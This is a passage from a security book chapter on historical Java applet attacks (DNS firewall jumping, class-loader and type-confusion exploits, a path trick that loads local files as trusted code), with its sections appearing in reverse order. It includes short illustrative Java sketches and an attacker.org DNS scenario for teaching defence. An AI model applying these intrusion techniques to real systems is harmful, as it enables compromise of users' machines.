constructor to call the constructor of its superclass, or another constructor of the same class, before it does anything else. For example, if you create a class called MyHashtable that extends the built-in class java.util.Hashtable, then you have to provide a constructor for MyHashtable. That constructor must call the constructor of java.util.Hashtable before it does anything else. The byte code Verifier ensures that these rules are followed. To prevent applets from making class loaders, the constructor for the class ClassLoader consults the Security Manager, which generates a Security Exception if the class loader being constructed would belong to an applet. This Security Exception can abort the creation of such an object. If an applet defines a new EvilClassLoader class to extend the basic ClassLoader, then the new constructor is required to call Java's basic ClassLoader constructor. Doing so generates a Security Exception that prevents the applet from creating an EvilClassLoader. What the Princeton team discovered was a trick by which a constructor could avoid calling its superclass constructor, without being caught by the Verifier. This allowed them to create an EvilClassLoader whose constructor did not call the basic ClassLoader constructor, and thus was not subject to the normal Security Manager check. The EvilClassLoader could then create type confusion. Having created type confusion, the attacker could then exploit it to achieve full system intrusion; that is, the attacker could do anything at all on the victim's machine.
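The check being bypassed can be pictured with a tiny sketch. This is our illustration of the rule, not any vendor's code; under the pre-Java 2 behavior described above, constructing this class from an applet fails because the call to the ClassLoader constructor consults the Security Manager.

// Sketch only. The constructor must call super() before doing anything else
// (the Verifier normally enforces this); ClassLoader's own constructor then
// asks the Security Manager, which throws a SecurityException for applets.
class EvilClassLoader extends ClassLoader {
    EvilClassLoader() {
        super();   // this call is where the Security Manager check fires
    }
}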
The (Sort of) Fix

Sun Microsystems and Netscape had two options for fixing this problem. They could prevent the superclass-constructor-avoidance by fixing the Verifier, or they could find another way of forcing the basic ClassLoader constructor to be called. They chose to do the latter. They added an initialized data field to every class loader, and set the field to true only when the basic ClassLoader constructor was run. The basic ClassLoader would refuse to perform the crucial defineClass action unless the initialized field was true.

The implementation created a new private ClassLoader method called defineClass0. This does the real work of defineClass. Redefining defineClass to check the initialized flag and call defineClass0 only if the flag was true helps to block this particular security hole. The change does not prevent an attacker from making a class loader, but it does prevent an attacker from using the new class loader once it has been made. The change took effect in Netscape Navigator 2.02. Unfortunately, future attacks managed to circumvent this fix.
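In outline, the fix looked roughly like the following. This is our own Java-flavored sketch of the structure just described, not the vendors' actual source.

// Illustrative sketch of the initialized-flag fix; not the real JDK code.
public abstract class ClassLoader {
    private boolean initialized = false;

    protected ClassLoader() {
        SecurityManager security = System.getSecurityManager();
        if (security != null) {
            security.checkCreateClassLoader();   // throws SecurityException for applets
        }
        initialized = true;   // only a loader that ran this constructor is usable
    }

    protected final Class defineClass(String name, byte[] data, int offset, int length) {
        if (!initialized) {
            throw new SecurityException("ClassLoader not initialized");
        }
        return defineClass0(name, data, offset, length);   // private method does the work
    }

    private native Class defineClass0(String name, byte[] data, int offset, int length);
}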
The Reaction

This flaw received more press coverage than any of the others. It had more news interest than the DNS bug because it was more serious. Later bugs did not receive as much coverage because by the time they came to light, the novelty of bug discovery had worn off. That does not mean that the current and future security problems are not just as serious. Whether or not security problems are splashed on the front pages, they still need to be taken seriously.

Perhaps the press coverage partly reflected a backlash against the extremely positive hype surrounding most press stories about Java at the time. Java is great, but many of the exaggerated claims went much too far. There was even a story stating that if you wrote programs in Java you would never have to debug them because they would always be right the first time. To be fair, only a little of the hype came from Sun. Much of it came from freelance consultants, self-proclaimed experts, and trainers who had an interest in seeing their Java bandwagon become a juggernaut.

When the Applets Running Wild flaw was discovered, Sun Microsystems, Netscape, and the flaw's discoverers gained some valuable experience discussing these issues with each other and with the press. As a result, the parties did a better job of conveying simple and consistent information to the public. Hopefully, this will remain true when future security holes come to light.
Section 7 -- You're Not My Type

As discussed in Chapter 2, the most common kind of serious security problem in Java involves type confusion. A type-confusion attack confuses the Java system about the types of data objects it is manipulating. The Java system treats objects as blocks of memory. Allocated memory contains the data fields of all objects, lined up one after the other. When a Java program has a reference to an object, what it really has internally is a pointer to the memory address storing the object. You can think of the pointer as tagged with a type that says what kind of object the pointer is pointing to.

As mentioned in Chapter 2, every aspect of Java security depends critically on the type-safety of the language. This means that if Java is going to be secure, it has to make sure that all pointers are properly tagged; that is, the tag must match the actual type of object that is being pointed to. In a type-confusion attack, a malicious applet creates two pointers to the same object, with incompatible type tags. When this happens, the Java system is in trouble. The applet can write into that memory address through one pointer, and read it through another pointer. The result is that the applet can bypass the typing rules of Java, completely undermining its security.

Figure 5.4 shows a type-confusion attack at work. The applet has two pointers to the same memory: one pointer tagged with type T and one tagged with type U. Suppose that T and U are defined like this:
class T { SecurityManager x; }
class U { MyObject x; }
Now the applet can run code like this:

T t = the pointer tagged T;
U u = the pointer tagged U;
t.x = System.getSecurity();   // the Security Manager
MyObject m = u.x;
The result is that the object ends up with a pointer, tagged as having type MyObject, to the memory representing Java's Security Manager object. By changing the fields of m, the applet can then change the Security Manager, even though the Security Manager's fields have been declared private. While this example showed how type confusion can be used to corrupt the Security Manager, the tactic may be exploited to corrupt virtually any part of the running Java system.
Figure 5.4 Type-confusion attack. Two of the objects in the reference table, t and u, are supposed to be of different types, but actually reference the same object in memory.
An Example of Type Confusion
Drew Dean discovered a typical type-confusion attack, based on Java's handling of array types. Java allows a program that uses a type T to use the type array of T. These array types are not explicitly declared by the programmer, but exist automatically. The Java Virtual Machine defines them automatically when they are needed. These array types are defined by the VM for internal use. Java gives them a name beginning with an open square bracket ([). As this character is not allowed to be the first character of a programmer-defined classname, there is no danger of conflict. Dean discovered, however, that in Netscape Navigator 3.0beta5, a Java byte code file could declare its own type name to be one of the special array type names. Attempting to load such a class would generate an error, but the Java VM would install the name in its internal table anyway. This redefined one of Java's array types and created a classic type-confusion scenario: Java considered the object an array, but it actually had some other type. The result was full system penetration. This problem was fixed in Navigator 3.0beta6.
The Type-Confusion Toolkit

The Princeton team, as a feasibility demonstration, created a toolkit that allows any type-confusion attack to be turned into a disarming of Java's security. In other words, the toolkit serves as a way of turning a small security breach into a complete system penetration. The type-confusion toolkit has not been released to the public and is considered too dangerous to describe in any detail here. The toolkit was recently revised to work against Java 2 systems.
Section 6 -- Slash and Burn

The second set of attacks involves Java code that passes itself off as belonging to the browser. In early versions of the JDK (before Java 2), code that came with the browser was assumed to be safe (see Chapter 2 and [McGraw and Felten, 1996]). The original built-in code distinction was scrapped with the introduction of code signing, and these days very little code is trusted (see Chapter 3). In any case, the Slash and Burn fraud allows the malicious code access it would not ordinarily have. It could, for example, access files on the local disk. In order to understand this attack properly, you need to understand how Java works; in particular, how Java accesses its own code on the browser's local disk.
Where Java Code Comes From

When a Java applet runs, many Java classes (pieces of Java code) are loaded and run. Some applet-related classes are loaded by the applet, using the Web server. Other classes are part of the browser itself. Browser-related code is stored with the browser on the local disk. Netscape, for example, keeps its Java class files zipped up in an archive called classes.zip. When Netscape is installed, the class archive needs to be put somewhere special, like /usr/local/lib/netscape on Unix machines. Because the browser classes were considered part of the trusted browser program, they were given more privileges. (This is no longer the case.)

In general, before JDK 1.1, Java treated code loaded from the local disk as trusted, and code loaded over the Net as untrusted. That meant if an attacker could somehow get some malicious code loaded from the local disk, the attacker was home free. The original system was changed significantly with the introduction
of JDK 1.0.2, which stopped treating code loaded off the disk as trusted. This change was made behind the scenes with little fanfare. As the Cache Cramming attack (explained later) shows, many people were confused by the change. From our discussion of the Java class loader in Chapter 2, we know that when Java needs to find a piece of code, say, for a class MyClass, it first looks on the local disk for a file called MyClass.class. If Java fails to find an appropriate file on the local disk, then it tries to fetch the file from the Web server that originally provided the applet. We've glossed over one key issue at this point: How does Java know what class to look for? The answer is that a class is only loaded when it is mentioned by another class already resident. This is called dynamic loading. The name of the mentioned class is stored in the Java code for the mentioning class. Java classes have names like security.book.chapter5. When the Java system wants to look up a class on the disk, it translates the dots in the class name into backslashes. The name security.book.chapter5 becomes security\book\chapter5.2 This transformed name is the filename used to search for the file on the local disk.
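The translation is simple enough to sketch in a few lines. This is an illustration of the naming scheme just described, not the browser's actual lookup code (the class name below is the book's example name):

import java.io.File;

// Sketch of the dot-to-separator translation described above.
public class NameToPath {
    public static void main(String[] args) {
        String className = "security.book.chapter5";
        // File.separatorChar is '\' on Windows and '/' on Unix.
        String fileName = className.replace('.', File.separatorChar) + ".class";
        System.out.println(fileName);   // e.g. security\book\chapter5.class
    }
}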
What Went Wrong: Dots and Slashes

If a bad guy wants to pass off a piece of code as trusted (in systems before JDK 1.0.2), two steps must be carried out: 1) Get the malicious code onto the victim's disk, and 2) Trick the victim's browser into loading it.

The first part, getting code onto the victim's disk, isn't as difficult as it sounds. For example, some machines have public FTP directories, where anyone can put a file. Alternatively, if the victim is using a shared, public machine, the attacker could get an account on that machine and put the file in that account's home directory.

Perhaps the most effective way to inject code is to take advantage of the browser's cache. Most Web browsers keep on-disk copies of recently accessed files. This allows repeated accesses to the same Web documents without continually downloading the documents. Unfortunately, it also gives a malicious applet a way to get a file onto the victim's machine. The applet could load the file across the Net, pretending that it was an image or a sound file. Once this was done, the file would be on the victim's disk in the cache. If the applet knew how the browser organized its cache, it would know where on the victim's disk the file resided. This sneaky trick makes a second appearance in the Cache Cramming attack as well (see page 171).

Once the file is on the victim's disk, the attacker tricks the victim's browser into loading the file. Since the browser only looks up classnames in relation to the current directory, the attacker would have to place a
file into the victim's working directory. Filename lookup is relative because Java classnames cannot start with a dot; therefore, the translated name cannot start with a backslash. David Hopwood discovered that Java 1.0.1 and Netscape Navigator 2.01 erroneously allowed a classname to start with a backslash. Such a classname could reference any file on the system, not just those files associated with the browser. For example, a class named \programs.browser.cache.file407 would be looked up on the local disk as \programs\browser\cache\file407. This trick could be used to cause any file on the local disk to be loaded as Java code. Because code loaded from the local disk was trusted (pre-JDK 1.0.2), it could proceed to illegally access the local system. This attack allows full system penetration-the bad guy can do anything at all on the victim's machine.
The Fix

This problem was fixed in Netscape Navigator 2.02 and in all Java-enabled versions of Microsoft Internet Explorer. The fix was simple: Prohibit classnames from starting with backslashes (or slashes, as the case may be). It is no longer possible to execute impostor code using the Slash and Burn attack.
Section 5 -- Jumping the Firewall

In the first problem, an attack applet launches network security attacks on other machines. This is something that an attacker could already do before Java came along. The twist is that by embedding the attack into an applet, the bad guy makes the attack come from the machine of an innocent bystander. Example: You're sitting at your desk, happily browsing the Web, and without realizing it, your machine is trying to penetrate the security of a machine down the hall. This kind of confusion is reason enough to use Java as the penetration vehicle, but the culprit has an even better reason for using Java.

Many corporate networks protect themselves from Internet intrusion through the use of a firewall. (See Figure 5.1.) If your firewall is well configured, it prevents the mischievous cracker from making direct use of the network to probe the defenses of your machines. The firewall does this by blocking certain types of network traffic from entering the corporate network.
Figure 5.1 A firewall stands between your internal network and the rest of the Internet.
It screens every packet of data coming across the network, allowing only certain kinds of packets through. A firewall is only as effective as the policy it implements.
A Java applet, though, doesn't look suspicious to most firewalls. (This was more true in 1997 than it is today. We discuss the state of the art in applet blocking in Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil.") Many firewalls examine the type of packet, not the contents of the packet. For some firewalls, to block Java applet traffic, a system manager would have to block all Web traffic.1 The fact that your browser requested the applet makes the firewall's job that much trickier. If the applet can open network connections to other machines, it can connect from your machine to another machine behind the firewall. In the current case, the attack originates from the inside rather than the outside. Since the firewall only filters traffic coming from the outside, it is helpless to prevent this sort of attack. This is especially dangerous since many sites have strong firewall protection, but almost no protection against attacks from the inside. In security circles, these sites are jokingly referred to as "crunchy on the outside and chewy in the middle." The people who designed Java-enabled browsers thought of the possibility of inside-the-network attacks, so they made a security rule to prevent it. The rule states: An applet may not open a network connection, except back to the server from which it came. If enforced properly, this rule stops any network probing by applets. Netscape Navigator 2.0 did not enforce this rule properly. In order to understand what went wrong, you need to understand how machines are named on the Internet.
Internet Naming

Like people, machines on the Internet need names to identify them, and machines use these names to send messages to each other across the network. At the lowest level, these names are numeric addresses. Because numeric addresses are difficult for people to remember, the Internet uses two layers of addressing. The Internet Protocol (IP) uses only numeric addresses to communicate between machines. The Domain Name System (DNS) keeps track of how the user-friendly names correspond to the IP numbers used to establish a machine's low-level connections.

An IP address is just a number. For example, the Web server at JavaSoft has the numeric address 11001110000110100011000001100100 in binary notation. IP addresses are more often written in dotted decimal form, which looks like 206.26.48.100. When the computers that make up the Internet talk to each other, they identify themselves with these numeric IP addresses. Computers deal naturally with numbers like this, but they are, to say the least, not very user-friendly.
The other sort of Internet names, DNS names, are made for people. They look like java.sun.com, or sandbox.rstcorp.com. These names are made up of often intelligible words strung together with dots to separate them. DNS divides the world up into domains like sun.com (Sun Microsystems) and cs.princeton.edu (the Princeton University Computer Science department). Each domain corresponds to a single administrative entity. It is up to that entity to define names that end in its domain name. For example, the cs.princeton.edu domain is free to define names like elvis.cs.princeton.edu. Anyone can create his or her own domain by registering with an organization called InterNIC and paying a modest fee. The owner of each domain is responsible for providing two DNS server machines that respond to queries about DNS names inside that domain. For example, if someone wants to know the IP address of elvis.cs.princeton.edu, he or she can ask one of the DNS servers for cs.princeton.edu. A single DNS name might refer to several IP addresses. There are two reasons for this. First, a machine might be connected to more than one network, with a separate IP address for each of its connections. Second, there might be several machines providing the same service. For example, espn.sportszone.com might actually correspond to several machines, all providing identical services. Sometimes several DNS addresses refer to the same IP address. For example, a company's Web server www.rstcorp.com and its FTP server ftp.rstcorp.com might actually be the same machine. This makes sense because management might later want to move the two functions onto separate machines. Using two separate names allows them to keep this flexibility.
What Went Wrong: The Java DNS Security Bug

To enforce the rule that an applet can connect only to the server from which it originated, the implementers of Java needed a way to check whether the machine an applet wanted to reach was the same as the machine that the applet came from. They did this as follows:

● Use DNS to translate the name of the Web server into a list of IP addresses.
● Use DNS to translate the name of the machine the applet wants to connect to into a list of IP addresses.
● Compare the two lists. If any address appears in both lists, declare the two machines are the same and allow the connection. If not, declare they are different and refuse the connection.
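In Java terms, the comparison amounted to something like the following sketch. This is our reconstruction of the policy for illustration, not the actual Navigator source:

import java.net.InetAddress;
import java.net.UnknownHostException;

// Sketch of the flawed policy described above: resolve both names via DNS
// and allow the connection if the two address lists share any entry.
class FlawedHostCheck {
    static boolean sameHost(String originHost, String targetHost)
            throws UnknownHostException {
        InetAddress[] origin = InetAddress.getAllByName(originHost);
        InetAddress[] target = InetAddress.getAllByName(targetHost);
        for (int i = 0; i < origin.length; i++) {
            for (int j = 0; j < target.length; j++) {
                if (origin[i].equals(target[j])) {
                    return true;   // any overlap is (wrongly) treated as "same machine"
                }
            }
        }
        return false;
    }
}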
This way of using DNS to authenticate a host is illustrated in Figure 5.2. Though this approach sounds good at first, it turns out to be too permissive.
Figure 5.2 How Java originally used DNS to make sure that an applet attached only to the machine that served it. The problem is that the check is too lenient.
The following scenario describes what can go wrong. Figure 5.3 shows the scenario visually.
Figure 5.3 How the DNS security bug allows an applet to jump a site's firewall. The figure shows several different snapshots arranged in order of occurrence.
Imagine that a bad guy wants to attack a machine called target.victim.org, with the IP address 10.10.10.2. The bad guy sets up a Web server called www.attacker.org, with IP address 172.16.16.16; then he waits. An unsuspecting person, surfing the Web on stooge.victim.org (IP address 10.10.10.1), happens to visit the attacker's Web site. The site contains a Java applet written by the attacker. The applet is downloaded to stooge.victim.org and run. The applet asks to create a network connection to bogus.attacker.org. Because that name is in the attacker.org domain, the attacker's DNS server is asked to provide an IP address for that machine and is free to provide any IP addresses it likes. The attacker's DNS server slyly returns the pair of addresses (10.10.10.2, 172.16.16.16). Because that list contains the address of the attacker's Web server (172.16.16.16), Java erroneously concludes that www.attacker.org and bogus.attacker.org are really the same machine, so it allows the connection to go ahead. Unfortunately, after verifying the connection is allowed, Java connects to the first address on the list, 10.10.10.2, or target.victim.org. The attacker has achieved his goal: to connect to the target machine. What does the attacker do next? The attacker can systematically probe the defenses of the target machine, looking for weaknesses. Sophisticated tools such as SATAN, Ballista, and ISS even exist to automate this part. If the attacker finds a weakness, the victim could be in big trouble.
The Fix

This problem was fixed by simply changing the criterion by which Java decides to allow a connection. The new approach is to store the IP address of the Web server, and allow a connection only to that IP address. This simple and complete solution is implemented in Netscape Navigator versions beginning with 2.01 and all Java-enabled Microsoft Internet Explorer versions. It is no longer possible to jump the firewall with Java using the DNS bug; however, it is important to make sure that you are not using the unpatched Netscape 2.0.
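For contrast with the flawed version sketched earlier, the repaired policy can be pictured like this (again our own sketch, not vendor code):

import java.net.InetAddress;
import java.net.UnknownHostException;

// Sketch of the fix: remember the single IP address the applet's byte code
// was actually fetched from, and compare candidate connections against it.
class FixedHostCheck {
    private InetAddress origin;   // recorded when the applet was downloaded

    FixedHostCheck(InetAddress origin) {
        this.origin = origin;
    }

    boolean mayConnectTo(String targetHost) throws UnknownHostException {
        return InetAddress.getByName(targetHost).equals(origin);
    }
}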
The Reaction
The announcement of this flaw triggered a flurry of press reports, beginning with a story in USA Today. Reporters learned of the flaw from a brief message in the comp.risks forum. The discoverers of the attack were surprised to learn that many reporters monitor comp.risks. It turned out that the existence of this flaw had been postulated independently by Steve Gibbons about four weeks before the announcement. Steve Gibbons had reported the bug to Sun Microsystems, but it was not fixed. After the USA Today article, Sun Microsystems and Netscape said they would fix the bug within days. It was fixed quite quickly.

The security researchers who uncovered the DNS attack were surprised to see that the press treated the news as a business story rather than as a technical story. This was probably a naïve point of view. These days, technology reporting, even when discussing noncommercial technology, seems to be considered a branch of business reporting. It was also surprising to see that many news organizations repeated a story that they had read elsewhere without contacting the parties involved and apparently without reconfirming any of the facts! As usual, when information is heard and then repeated, small inaccuracies creep in at each stage. It was sometimes possible to figure out who had copied the story from whom, by tracking small inconsistencies.

The USA Today story also triggered a blip in the stock market. Netscape's stock price dropped significantly on the day the story appeared. CNN and the Nightly Business Report attributed the drop to the announcement of this flaw, although there were other factors (for example, the expiration of the post-IPO embargo on insider sales) also driving down Netscape's stock that week. In any case, the stock bounced back when it became clear that the product was not irretrievably broken.
Section 4 -- A Chronology of Problems

To date, 16 serious security problems have been discovered in implementations of Java. Table 5.1 lists the holes and their accompanying exploits by name. A brief chronology follows that describes each flaw. These flaws will be discussed in more detail later in this chapter. Some of these flaws allow full system penetration. This means that an attacker could exploit them to do literally anything to your machine, including corrupting your data, reading your private data, injecting a virus, or leaving a trapdoor to reenter your machine at will.

Table 5.1 Attack Applets that Exploit Holes in the System
DATE             ATTACK APPLET
February 1996    Jumping the Firewall
March 1996       Slash and Burn
March 1996       Applets Running Wild
May 1996         Casting Caution to the Wind
June 1996        Tag-Team Applets
June 1996        You're Not My Type
July 1996        Casting Caution to the Wind (reprise)
August 1996      Big Attacks Come in Small Packages
February 1997    Steal This IP Number
February 1997    Cache Cramming
March 1997       Virtual Voodoo
April 1997       The Magic Coat
May 1997         Verifying the Verifier
July 1997        The Vacuum Bug
August 1997      Look Over There
July 1998        Beat the System
February 1996: Drew Dean, Edward Felten, and Dan Wallach at Princeton discovered a flaw in Java's networking software, affecting Netscape Navigator 2.0. This flaw was postulated independently by Steve Gibbons. It could be exploited to launch security attacks on other machines on a private network. This flaw was fixed in Netscape Navigator 2.01. The resulting attack is called Jumping the Firewall. See page 147. This attack resulted in one of the two Java-related CERT alerts [CERT, 1996a].

March 1996: David Hopwood at Oxford University found a flaw that allows an attack that tricks Java into treating the attacker's applet as trusted code. This flaw allowed full system penetration. It affected Netscape Navigator 2.01 and was fixed in Netscape Navigator 2.02. The resulting attack is called Slash and Burn. See page 153.

March 1996: The Princeton team (Dean, Felten, and Wallach) found a bug in the Java byte code Verifier and a flaw in the class-loading mechanism. Together, these allowed full system penetration. This problem affected Netscape Navigator 2.01 and was fixed in Netscape Navigator 2.02. The resulting attack is called Applets Running Wild. See page 158. This attack resulted in the second of the two Java-related CERT alerts [CERT, 1996b].

May 1996: Independent consultant Tom Cargill, working with the Princeton team (Dirk Balfanz, Dean, Felten, and Wallach), found a flaw in the implementation of the Java interpreter. This flaw allowed full system penetration. It affected Netscape Navigator 2.02 and Microsoft Internet Explorer 3.0beta1, and was fixed in Navigator 3.0beta3 and Explorer 3.0beta2. The resulting attack is called Casting Caution to the Wind. See page 163.

June 1996: Hopwood found another flaw in the interpreter that again allowed full system penetration. This flaw affected Netscape Navigator 3.0beta3 and was fixed in Navigator 3.0beta4. The resulting attack is called Tag-Team Applets. See page 165.

June 1996: Balfanz, Dean, and Felten found a flaw in Java's implementation of array types that allowed full system penetration. This flaw affected Netscape Navigator 3.0beta5 and was fixed in Navigator 3.0beta6. The resulting attack is called You're Not My Type. See page 156.

July 1996: Cargill, Balfanz, Dean, and Felten found another implementation flaw in the Java interpreter. This flaw allowed an attacker to mount some attacks on network services on other private-network machines. This flaw affected Netscape Navigator 3.0beta5 and was fixed in Navigator 3.0beta6. This attack is also called Casting Caution to the Wind. See page 163.

August 1996: Balfanz and Felten found a flaw in Microsoft's Java implementation. The flaw allowed code in an attack applet to become a member of a security-critical Java package, thus gaining the ability to change various security parameters. This in turn gives the applet full access to the target machine's files and the network. This flaw affected Microsoft Internet Explorer 3.0beta3 and was fixed in Explorer 3.0beta4. The resulting attack is called Big Attacks Come in Small Packages. See page 167.

February 1997: A pair of British hacker/consultants, Ben Laurie and Major Malfunction, discovered two separate flaws, one that worked only against Netscape Navigator 3.x and the other that worked only against Microsoft Internet Explorer 3.x. The Microsoft flaw was much more serious than the Netscape flaw. The fact that the attacks were browser specific serves to emphasize that different vendors have different approaches to implementing Java security. To be sure, both vendors are coding to the same specification, but there are many ways to skin a cat. The two attacks are called Steal This IP Number and Cache Cramming, respectively. See pages 169 and 171.

March 1997: Security researchers at JavaSoft discovered a subtle error in the JVM and immediately patched it. This illustrates how serious JavaSoft is about security. The error was deep inside the Virtual Machine code and affected all browsers. The attack is called Virtual Voodoo. See page 172.

April 1997: Soon after the release of JDK 1.1, the Princeton team discovered a serious flaw in the newly implemented code-signing system. The flaw allowed an attack applet to take on maximum privilege allocated inside a system. Because only the HotJava browser supported JDK 1.1, it was the only browser affected by the flaw. This attack is called The Magic Coat. See page 172.

May 1997: The Kimera group at the University of Washington, led by Professor Brian Bershad, created a byte code Verifier of their own using formal methods and strict software engineering processes. In order to test their implementation, the Kimera group created an automatic test harness that generated millions of tests by mutation. They then tested their Verifier against commercially available Verifiers. In the course of testing, they identified 27 errors in various commercial Verifiers. One error was severe enough to warrant a patch. The others were patched in later releases of the JDK. This set of attacks is called Verifying the Verifier. See page 174.

July 1997: Sun's response to the Verifier errors in May (which downplayed their severity) prompted the Kimera group to create an exploit that attacked Netscape Navigator 3.x. The attack was able to gain access to protected information in the browser's memory space, including private keys used in setting up Secure Sockets Layer (SSL) sessions. This attack is called the Vacuum Bug. See page 177.

August 1997: Creative Concepts consultant Ben Mesander discovered a weakness in the way HTTP redirect operations were handled by Java. The weakness was particularly obvious in Microsoft Internet Explorer 3.x but was also present (in a subtler fashion) in Netscape Navigator 3.x. This attack is called Look Over There. See page 178.

July 1998: Balfanz, Dean, Felten, and Wallach found a security flaw in the ClassLoader implementation of JDK 1.1 and JDK 1.2beta3 that allows a malicious ClassLoader to override the definition of built-in "system" types like java.lang.Class. When properly abused, this can lead to a type confusion attack that completely compromises security. The flaw requires use of a secondary flaw to gain a foothold. Mark LaDue had earlier discovered such a flaw in Netscape 4.0x's Security Manager. Thus, Netscape 4.0x is exploitable, while other Java VMs (Sun's and Microsoft's) do not appear to be exploitable even though they contain the same flaw. This attack is called Beat the System. See page 182.

The rest of this chapter describes these flaws in more detail.
When Holes Happen

The chronology presented here has an interesting meta-level property. Both in August 1996 and in August 1997, several months followed in which no major security holes were discovered. Interestingly, the period of six months in late 1996 was of long enough duration that some Java evangelists began to claim that all Java holes had been discovered and that Java was completely secure. They were wrong.

First of all, anyone who claims any program or programming language is completely secure should be viewed with suspicion. There is no such thing as 100-percent security; the best we can do is minimize risk. This goes for Java as well as any other computer system. Fortunately, Java mitigates many risks that competing systems of mobile code like ActiveX and JavaScript do not (see Chapter 1, "Mobile Code and Security: Why Java Security Is Important," for details). This makes Java more secure than those systems, but it does not make Java perfectly secure. Short of proving Java correct (which is unlikely ever to happen given the state of formal methods), we must live with potential security holes.

Second, the pattern in the chronology corresponds with major releases of the JDK. The gap between August 1996 and February 1997 included the time period when JDK 1.0.2 was in common use and JDK 1.1 had not yet been released. As soon as JDK 1.1 was released, some new holes were discovered. The same sort of gap appeared as Java 2 slowly trickled out. This reflects two facts: 1) each major release includes much new functionality, and 2) Java is complicated, and complicated systems always include room for error. From these facts, it is natural to infer that the discovery of holes will coincide with major releases.
Attack Applets: Exploiting Holes in the Security Model

Section 3 -- What Applets Aren't Supposed to Do
Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," and Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," discussed the Java security model at length. Java's designers tried to ensure that untrusted or partially trusted applets could not misbehave by placing them in an adjustable sandbox. For a concise listing of things that untrusted Java applets should not be allowed to do, see Chapter 2. It is also worth reading the "Frequently Asked Questions-Java Security'' Web page served by Sun Microsystems at java.javasoft.com/sfaq. In order to provide concrete examples of Java security policies that work, Sun's Security FAQ page includes pointers to a number of applets that cannot get around Java security. The good news is that some straightforward approaches to breaching security will fail. The bad news is that crackers usually don't give up after the straightforward approach fails. Fortunately, neither do security researchers. It is always interesting to get an objective outsider's opinion about Java security. That is probably one of the reasons you are reading this book. Appendix A, "Frequently Asked Questions: Java Security, Java versus ActiveX," includes a hard copy of two of the Princeton Secure Internet Programming team's Java Security FAQs. An up-to-the-minute version of the FAQs can be found at www.cs.princeton.edu/sip/javafaq.html.
Attack Applets: Exploiting Holes in the Security Model
Section 2 -- Attack Applets

It is important to reemphasize that the attacks described in this chapter are not hypothetical; each has been implemented by either the Secure Internet Programming team (SIP) at Princeton University or other researchers. Each was successfully used to break into a machine in the laboratory. The Princeton team, who have discovered a majority of known holes, choose not to release the resulting attack applets onto the Net. Other researchers, especially consultants, tend to release their attacks.

Attack applets are the most dangerous kind of hostile applets. They do more than simply annoy or deny service. The end result of an attack applet is the same as being hacked by a cracker: Your system is wide open for unauthorized access. According to both our research and that of the CERT Coordination Center (an organization that keeps track of computer security violations on the Internet), there have been no confirmed reports of loss due to the attacks described in this chapter. There are, however, a few cases of attacks possibly carried out with applets. It is, of course, impossible to rule out the possibility of attacks that haven't been discovered or that haven't been reported. The lack of reports indicates that the number of attacks, if any, has been small. Successfully implemented attack applets probably haven't occurred in the wild, but there can be no guarantee that one won't show up tomorrow. The danger is real enough that CERT recommends people disable Java when using particular versions of popular browsers [CERT, 1996a; CERT, 1996b].
Attack Applets: Exploiting Holes in the Security Model

Section 1 -- Implementation Errors or Specification Errors?
One question we are commonly asked is whether Java's security woes are due to simple bugs or reflect deeper design problems. The answer is a bit complicated, as we shall see.
Software Engineering Meets Internet Time

Software that is properly engineered goes through a standard process from requirements design, through detailed specification, to actual implementation. In the world of consumerware (software created for the mass consumer market, like browsers and JDKs), pressure to be first to market and retain what is known as "mind share" compresses the development process so much that software engineering methods are often thrown out the window. This is especially true of testing, which regularly ends up with no scheduled time and few resources. An all too common approach is to leave rigorous testing to users in the field (sometimes even paying users when they find bugs!). We think this is just awful.

The Internet time phenomenon has exacerbated the software engineering problem. These days, Internet years rival dog years in shortness of duration (the standard ratio is seven dog years to one regular year). So three months of regular time are currently equivalent to a complete Internet "year." Given the compressed development schedules that go along with this accelerated kind of calendar, the fact that specifications are often very poorly written (if they exist at all) is not surprising. The authors commonly encounter popular consumer-oriented systems that have no specifications. Java suffered from this problem in its early years as well. Fortunately, Java does have an informal specification today. That's always a good start.

One of the most common misconceptions about Java security holes is that they are all simple
implementation errors and that the specification has been sound and complete since day one. Threads in the newsgroup comp.lang.java.security and other newsgroups often repeat this fallacy as people attempt to trivialize Java's security holes. The truth is that many of the holes described in this chapter are simple implementation bugs (the code-signing hole from April 1997 comes to mind; see The Magic Coat later in the chapter), but others, like problems discovered in Java class loaders, are not. Sometimes the specification is just plain wrong and must be changed. As an example, consider how the Java specification for class loading has evolved.

Often it is hard to determine whether a security hole is an implementation problem or a specification problem. Specifications are notoriously vague. Given a vague specification, who is to blame when a poor implementation decision is made? Specifications are also very often silent; that is, when a hole is discovered and the specification is consulted, there is nothing said about the specific problem area. These sorts of omissions certainly lead to security problems, but are the resulting problems specification problems or implementation problems?

In the end, the holes are fixed, regardless of whether they are implementation bugs or design-level problems. This leads to a more robust system. If Java stood still long enough, you would think all the holes would be discovered and fixed. But Java is far from still. With every major JDK release, the Java source code has doubled in size. Much new functionality has been added to the language, some of which has important security implications. The addition of flexible access control in Java 2 is a case in point. Implementing a code-signing and access-control system is nontrivial, and the code is certainly security-critical. Other examples are serialization and remote method invocation (RMI). Subtle security problems are likely to be discovered in these and other new Java subsystems.
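To make the class-loading example more concrete, the sketch below (ours, not taken from the JDK source) shows the parent-first delegation discipline that the evolving Java 2 class-loading specification settled on. Delegating to the parent loader before defining a class locally is what keeps an applet-supplied class loader from substituting its own version of a built-in type; the class name ParentFirstLoader is hypothetical, and a real browser loader does far more than this:

public class ParentFirstLoader extends ClassLoader {
    protected synchronized Class loadClass(String name, boolean resolve)
            throws ClassNotFoundException {
        // 1. Reuse a class this loader has already defined.
        Class c = findLoadedClass(name);
        if (c == null) {
            try {
                // 2. Ask the parent loader first, so system classes
                //    such as java.lang.Object always win.
                c = getParent().loadClass(name);
            } catch (ClassNotFoundException e) {
                // 3. Only then consult this loader's own sources.
                c = findClass(name);
            }
        }
        if (resolve) {
            resolveClass(c);
        }
        return c;
    }

    protected Class findClass(String name) throws ClassNotFoundException {
        // A real loader would fetch byte code (over the network, say)
        // and call defineClass here; omitted in this sketch.
        throw new ClassNotFoundException(name);
    }
}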
Discovering Holes

Why is it that all the known attack applets covered in this chapter were discovered by good guys and not bad guys? The quick but unsettling answer is: pure luck. The Princeton team and other Java security researchers are not the smartest people in the world (sorry guys), and the holes uncovered in Java so far do not require years of advanced training to find. There is no reason that malicious crackers could not discover such holes for themselves. The Java industry has been fortunate that the people who usually discover Java security problems are honest and want to see Java improved so that it is safer to use. Also fortunate is the punctuality and accuracy of typical vendor response.

